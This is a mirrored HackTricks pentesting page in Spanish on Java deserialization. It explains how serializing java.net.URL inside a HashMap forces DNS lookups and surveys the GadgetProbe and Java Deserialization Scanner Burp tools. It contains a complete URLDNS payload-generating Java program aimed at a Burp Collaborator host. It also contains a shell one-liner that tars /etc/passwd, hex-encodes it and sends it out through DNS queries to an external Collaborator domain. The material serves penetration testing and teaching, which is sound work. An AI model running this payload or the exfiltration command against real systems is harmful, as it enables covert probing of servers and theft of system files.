Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 06:28:27 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/deserialization/java-dns-deserialization-and-gadgetprobe.md

11 KiB
Raw Blame History

Java DNS Deserialization, GadgetProbe y Java Deserialization Scanner

Java DNS Deserialization, GadgetProbe y Java Deserialization Scanner

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Solicitud DNS en deserialización

La clase java.net.URL implementa Serializable, esto significa que esta clase puede ser serializada.

public final class URL implements java.io.Serializable {

Esta clase tiene un **comportamiento curioso.** Según la documentación: "**Dos hosts se consideran equivalentes si ambos nombres de host pueden resolverse en las mismas direcciones IP**".
Entonces, cada vez que un objeto URL llama a **cualquiera** de las **funciones `equals`** o **`hashCode`**, se va a **enviar** una **solicitud DNS** para obtener la dirección IP.

**Llamar** a la función **`hashCode`** **desde** un objeto **URL** es bastante fácil, basta con insertar este objeto en un `HashMap` que va a ser deserializado. Esto se debe a que **al final** de la función **`readObject`** de `HashMap` se ejecuta este código:

private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[   ...   ]
for (int i = 0; i < mappings; i++) {
[   ...   ]
putVal(hash(key), key, value, false, false);
}

Es going a execute putVal con cada valor dentro del HashMap. Pero, más relevante es la llamada a hash con cada valor. Este es el código de la función hash:

static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}

Como puedes observar, al deserializar un HashMap la función hash se va a ejecutar con cada objeto y durante la ejecución del hash se va a ejecutar .hashCode() del objeto. Por lo tanto, si deserializas un HashMap que contiene un objeto URL, el objeto URL ejecutará .hashCode().

Ahora, echemos un vistazo al código de URLObject.hashCode() :

public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;

hashCode = handler.hashCode(this);
return hashCode;

Como puedes ver, cuando un URLObject ejecuta .hashCode(), se llama a hashCode(this). A continuación puedes ver el código de esta función:

protected int hashCode(URL u) {
int h = 0;

// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();

// Generate the host part.
InetAddress addr = getHostAddress(u);
[   ...   ]

Puede ver que se ejecuta un getHostAddress al dominio, lanzando una consulta DNS.

Por lo tanto, esta clase puede ser abusada para lanzar una consulta DNS para demostrar que la deserialización es posible, o incluso para exfiltrar información (puede agregar como subdominio el resultado de la ejecución de un comando).

Ejemplo de código de carga útil URLDNS

Puede encontrar el código de carga útil URDNS de ysoserial aquí. Sin embargo, solo para facilitar la comprensión de cómo codificarlo, creé mi propio PoC (basado en el de ysoserial):

import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;

public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}

public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.

// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);

//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}


class SilentURLStreamHandler extends URLStreamHandler {

protected URLConnection openConnection(URL u) throws IOException {
return null;
}

protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}

Más información

GadgetProbe

Puedes descargar GadgetProbe desde la tienda de aplicaciones de Burp Suite (Extender).

GadgetProbe intentará determinar si algunas clases Java existen en la clase Java del servidor para que puedas saber si es vulnerable a algún exploit conocido.

Cómo funciona

GadgetProbe usará el mismo payload DNS de la sección anterior pero antes de ejecutar la consulta DNS, intentará deserializar una clase arbitraria. Si la clase arbitraria existe, la consulta DNS será enviada y GadgetProbe notará que esta clase existe. Si la solicitud DNS nunca se envía, esto significa que la clase arbitraria no fue deserializada con éxito, por lo que no está presente o no es serializable/explotable.

Dentro de github, GadgetProbe tiene algunas listas de palabras con clases Java para ser probadas.

Más información

Escáner de Deserialización Java

Este escáner puede ser descargado de la tienda de aplicaciones de Burp (Extender).
La extensión tiene capacidades pasivas y activas.

Pasivo

Por defecto, verifica de manera pasiva todas las solicitudes y respuestas enviadas buscando bytes mágicos de serialización Java y presentará una advertencia de vulnerabilidad si se encuentra alguno:

Activo

Pruebas manuales

Puedes seleccionar una solicitud, hacer clic derecho y Enviar solicitud a DS - Pruebas manuales.
Luego, dentro de la pestaña Escáner de Deserialización --> pestaña Pruebas manuales puedes seleccionar el punto de inserción. Y lanzar las pruebas (Selecciona el ataque apropiado dependiendo de la codificación utilizada).

Aunque esto se llama "Pruebas manuales", es bastante automatizado. Comprobará automáticamente si la deserialización es vulnerable a cualquier payload ysoserial verificando las bibliotecas presentes en el servidor web y resaltará las que sean vulnerables. Para verificar las bibliotecas vulnerables puedes seleccionar lanzar Javas Sleeps, sleeps a través del consumo de CPU, o usando DNS como se ha mencionado anteriormente.

Explotación

Una vez que hayas identificado una biblioteca vulnerable, puedes enviar la solicitud a la pestaña Explotación.
En esta pestaña tienes que seleccionar el punto de inyección de nuevo, y escribir la biblioteca vulnerable para la que quieres crear un payload, y el comando. Luego, solo presiona el botón de Ataque apropiado.

Información de Exfiltración DNS de Deserialización Java

Haz que tu payload ejecute algo como lo siguiente:

(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)

Más Información

Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks: